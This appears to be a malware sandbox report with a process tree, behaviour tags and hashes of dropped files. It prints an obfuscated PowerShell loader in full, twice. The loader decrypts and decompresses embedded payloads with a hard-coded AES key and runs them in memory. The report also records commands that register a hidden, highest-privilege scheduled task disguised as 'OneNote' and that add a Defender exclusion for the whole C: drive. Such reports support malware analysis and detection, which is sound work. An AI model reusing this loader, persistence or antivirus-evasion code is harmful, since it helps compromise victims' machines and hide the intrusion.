''),'ChsWdlansWdlgesWdlEsWdlxsWdltesWdlnsWdlsisWdlosWdlnsWdl'.Replace('sWdl', ''),'LHcgboadHcgb'.Replace('Hcgb', ''),'RtuYueatuYudLtuYuituYunetuYustuYu'.Replace('tuYu', ''),'EleDFGgmeDFGgnDFGgtDFGgAtDFGg'.Replace('DFGg', ''),'ThSmVranhSmVsfhSmVormhSmVFihSmVnahSmVlBhSmVlohSmVckhSmV'.Replace('hSmV', '');powershell -w hidden;function zUhpG($Vgbyz){$emkHJ=[System.Security.Cryptography.Aes]::Create();$emkHJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$emkHJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$emkHJ.Key=[System.Convert]::($QkEK[3])('/Hfk3/0HindNj+4DXkevo5htFNrm49tWPnBdwypza2U=');$emkHJ.IV=[System.Convert]::($QkEK[3])('Tm3jafLgvfKY6mYPS/HLjQ==');$uFrFo=$emkHJ.($QkEK[1])();$ghdHz=$uFrFo.($QkEK[13])($Vgbyz,0,$Vgbyz.Length);$uFrFo.Dispose();$emkHJ.Dispose();$ghdHz;}function yGhYh($Vgbyz){$BiDCz=New-Object System.IO.MemoryStream(,$Vgbyz);$rDAyB=New-Object System.IO.MemoryStream;$gTfnb=New-Object System.IO.Compression.GZipStream($BiDCz,[IO.Compression.CompressionMode]::($QkEK[4]));$gTfnb.($QkEK[6])($rDAyB);$gTfnb.Dispose();$BiDCz.Dispose();$rDAyB.Dispose();$rDAyB.ToArray();}$GQdwM=[System.IO.File]::($QkEK[11])([Console]::Title);$asQpo=yGhYh (zUhpG ([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 5).Substring(2))));$wqKmU=yGhYh (zUhpG ([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 6).Substring(2))));[System.Reflection.Assembly]::($QkEK[10])([byte[]]$wqKmU).($QkEK[8]).($QkEK[5])($null,$null);[System.Reflection.Assembly]::($QkEK[10])([byte[]]$asQpo).($QkEK[8]).($QkEK[5])($null,$null); "4⤵PID:4868
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1020
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\n1')5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2964
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 73846' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network73846Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3856
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network73846Man.cmd"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4120 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network73846Man.cmd"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network73846Man.cmd';$QkEK='SplexkUitexkU'.Replace('exkU', ''),'CbUqOrbUqOeabUqOtebUqODecbUqOrbUqOybUqOpbUqOtorbUqO'.Replace('bUqO', ''),'MZgfwaiZgfwnMoZgfwdulZgfweZgfw'.Replace('Zgfw', ''),'FrbSRYomBbSRYasbSRYe6bSRY4StbSRYribSRYnbSRYgbSRY'.Replace('bSRY', ''),'DecaHWxomaHWxpraHWxesaHWxsaHWx'.Replace('aHWx', ''),'IMSwmnMSwmvoMSwmkMSwmeMSwm'.Replace('MSwm', ''),'CoHbycpyTHbycoHbyc'.Replace('Hbyc', ''),'GeBtWttCuBtWtrBtWtrBtWtenBtWttPrBtWtocBtWtessBtWt'.Replace('BtWt', ''),'EynVQntynVQrynVQyPoynVQintynVQ'.Replace('ynVQ', ''),'ChsWdlansWdlgesWdlEsWdlxsWdltesWdlnsWdlsisWdlosWdlnsWdl'.Replace('sWdl', ''),'LHcgboadHcgb'.Replace('Hcgb', ''),'RtuYueatuYudLtuYuituYunetuYustuYu'.Replace('tuYu', ''),'EleDFGgmeDFGgnDFGgtDFGgAtDFGg'.Replace('DFGg', ''),'ThSmVranhSmVsfhSmVormhSmVFihSmVnahSmVlBhSmVlohSmVckhSmV'.Replace('hSmV', '');powershell -w hidden;function zUhpG($Vgbyz){$emkHJ=[System.Security.Cryptography.Aes]::Create();$emkHJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$emkHJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$emkHJ.Key=[System.Convert]::($QkEK[3])('/Hfk3/0HindNj+4DXkevo5htFNrm49tWPnBdwypza2U=');$emkHJ.IV=[System.Convert]::($QkEK[3])('Tm3jafLgvfKY6mYPS/HLjQ==');$uFrFo=$emkHJ.($QkEK[1])();$ghdHz=$uFrFo.($QkEK[13])($Vgbyz,0,$Vgbyz.Length);$uFrFo.Dispose();$emkHJ.Dispose();$ghdHz;}function yGhYh($Vgbyz){$BiDCz=New-Object System.IO.MemoryStream(,$Vgbyz);$rDAyB=New-Object System.IO.MemoryStream;$gTfnb=New-Object System.IO.Compression.GZipStream($BiDCz,[IO.Compression.CompressionMode]::($QkEK[4]));$gTfnb.($QkEK[6])($rDAyB);$gTfnb.Dispose();$BiDCz.Dispose();$rDAyB.Dispose();$rDAyB.ToArray();}$GQdwM=[System.IO.File]::($QkEK[11])([Console]::Title);$asQpo=yGhYh (zUhpG ([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 5).Substring(2))));$wqKmU=yGhYh (zUhpG ([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 6).Substring(2))));[System.Reflection.Assembly]::($QkEK[10])([byte[]]$wqKmU).($QkEK[8]).($QkEK[5])($null,$null);[System.Reflection.Assembly]::($QkEK[10])([byte[]]$asQpo).($QkEK[8]).($QkEK[5])($null,$null); "7⤵
- System Location Discovery: System Language Discovery
PID:1568
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe7⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4104
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network73846Man')8⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:764
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 73846' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network73846Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:428
-
-
-
-
-
-
C:\Windows\system32\timeout.exetimeout /nobreak /t 14⤵
- Delays execution with timeout.exe
PID:2256
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess Powershell.exe1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1400
-
C:\Windows\system32\taskkill.exetaskkill /IM cmstp.exe /F1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4808
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD5938ffc2cba917b243d86b2cf76dcefb4
SHA1234b53d91d075f16cc63c731eefdae278e2faad3
SHA2565c1eaf13b15f1d5d1ea7f6c3fcbeff0f8b0faf8b9a620ecd26edb49d667f56ca
SHA512e4ec928e5943a47739c862e3fd0c4bd9f1f21942e2416269f5057f5df49ce451d90acea39ee5319a0828ca1d944c2eda3eb8e7ab19984c7b8624a58f2111c314
-
Filesize
21KB
MD54f7ec23d676489b635e107c69513d704
SHA18c5fe44249014df160f1a2ec001383b3e9b1574a
SHA256d8015174965e2931c5a67a1f46d8f71c886cebb78a09b6f87d406c37387fc210
SHA512cb23fc176bf27c465e5f3a47e6844593d1819dc58a07cbcbb883a9fa84eeea3bd7eb9ea5d15fe90a56033395f59fb0a04603741da5663d06859a70c41583afcc
-
Filesize
20KB
MD58fd86c800cebce525814cce7d2f7f399
SHA13597b4d487504a19c97f8cd13a12f00719ec3dd1
SHA256a89c1934e5b6ac80036ca23b92176a7f6c6ec598e5dbfc5de2e223967d28e192
SHA5128fc19f70ffff4ab85d73f5266cca45e78e68be9d7c583f5c5d8cdd02e5d32fe822046c45ba3d54fa2e0d983548c829ebe59524f143238ea4f10c3c31cab1de4d
-
Filesize
21KB
MD521245d35baff5f735b94db3c395a2570
SHA1878352812b5c1d25e0c2ab2889e00d8cc995ac3e
SHA256a1504a91105539a7aee90227539000f88a10994b25a36976f94c3feb5c266ab8
SHA51264cda912c1be8c073b41df0fafcadb9c0fd91606b2b3f0f5e98411374dd4ebf5b9ae575a9bf90aca3f5e73580f9eba6e1d847c385d76dd8e5e251e033e6f4265
-
Filesize
20KB
MD592e3ac547eb4382068973df2de1252a2
SHA15e21bfe06723dbb491afb868c822aa6ee2c0b755
SHA256c6900f4f782499962c48c1f3937f72d253158dc3cc0d30fae7501df8c7d1c064
SHA5128f44ff887ace1e7854b2fb666dd028fec07ed9ebbab68fb73ab3d148389f08eadf5fef50e264ee5c8818188ab917d4223f22ea86360ab23ebfb4ffc87610d229
-
Filesize
1KB
MD5f77003de6f00dac9649dec7f534827b6
SHA10327d785254fbba9a16de307d84dfe1c61d31cac
SHA2563603976f5e45d8d8c307a01dcb87c115a623ecead7022a2cbb7e2439927ec349
SHA51268fe8fcda7fe843802bcce143ffe4696fd1b6ba83efd350b63a15defdc372d6cf1c9b61ae1e5c20c2968a65bf206ffdfa206f114cb093e90b89fb9d5aee08031
-
Filesize
1KB
MD5b66db53846de4860ca72a3e59b38c544
SHA12202dc88e9cddea92df4f4e8d83930efd98c9c5a
SHA256b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030
SHA51272eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527
-
Filesize
1KB
MD59f294120a973b2ee757065853ff0fe18
SHA1bd99e82691cbfef021abb39bed7393a7e3e9a8ea
SHA25626058fa543dd00500eaf08a38540a5912e80716c9ab52ac8cf88f9318b49ab4f
SHA5126af6ec136f14764ef65e9280d1376ed194d0e79d4035bf8d36baa23d9f27c31d1ef3d094cc363f0c17e8d9b77884dd06a205c4577fec5e68ca0c37b274233935
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
562KB
MD5d1d99208a499e870e1e0a34a2cbba829
SHA185f7090ce76bdae0a07154b27117ec5ac9e9f673
SHA256d302c8c72b06785d8d4af94a118856907e3775becb17253ba62ccd3ddc669879
SHA512badea3d061cdfd1c7929be03d0c4c66eb5cab3091740f935d58a601a56f5be6c372c3ae48bef6ef759581a5c4244885de1c5c02247391bfca7aee5c1c62d7497
-
Filesize
4KB
MD541b015d1b6d243914fa252d34631f0f3
SHA1556fb901e95e22ac3b2315e0c862478781e3d7d9
SHA256de851d31f15117f349f8fab6cda19e72de2fa85c9b4b0015c4e600ae9353bcc6
SHA51210b53cb6d795603571d2dccbdf2ebc5d3c270d5e21c1e3a15cc7978c451f79ac9e000e99bb9a8391e01f7f04169c02702f41d23eddc7729751cc58d3546e7780
-
Filesize
655B
MD5a50ad3c72d773f4374ccb89b74a7b0ea
SHA12efe6cda55cd90cfda1f6af35686f813e252a607
SHA256f48f5fbc541f12fcb33c204ad87fc80b693fd3241ecd1b79dbe2b6cc7b636f5a
SHA512d564a299836e15f8139263ffbd165a0f1fa6b6c0b30b6d037f7822aacea5351e7f8f461422e5258e754e4e80d1aa7b4773d91632b1c0264a64020fba5b9b728f
-
Filesize
652B
MD5df502c111170b0c00c0fd6b41f9e98d3
SHA1e91fe223130d7e145f634070e7722d0e2e4fa160
SHA2565685e895721f1c636e036e290248688a197e707020e4cbc77323e2cfd956c27e
SHA5120fed781df614e887a7ee2a26b9b15c417b42eca03f2241d6ad203b7ad92fae1fd3869803216af0a062e1d119a3ec76015b34dbd04f582bc53972d98ed5292dc7
-
Filesize
2KB
MD5da774b7c7335bf78596f22c13b46a80c
SHA143d248947111e2d943aa1c77df51fd5192e92797
SHA256da5feb1c361cdfd307e18c753790933d18968da7a5de454a2fae3d9dd5e1fba8
SHA5129c8efab5895c50069512e56b4efc81547f70092064cad8cf526a77f087dace036e876e4da5178d30be213b0c3d9214ef660920c6eff2c7474e5a6d47dfea40d0
-
Filesize
369B
MD57e4022187959658a9a4d59329a03cd2b
SHA1f6f3204e98ec9a63a0ab290540ad4e5d6bbc81b1
SHA25664ae6dbd646c0e694db7beea28b258cd3e2b0a6a8f75225fbf5f6914e28f6370
SHA512bd11e8ccae8a34ae82d17d86917c7a1ab72f2fbc0911c811f4639a840aa9a91ef99735daa6111bf86a9cf758b6f5fadcbd34347016e3ee71467c5ac9ef5293aa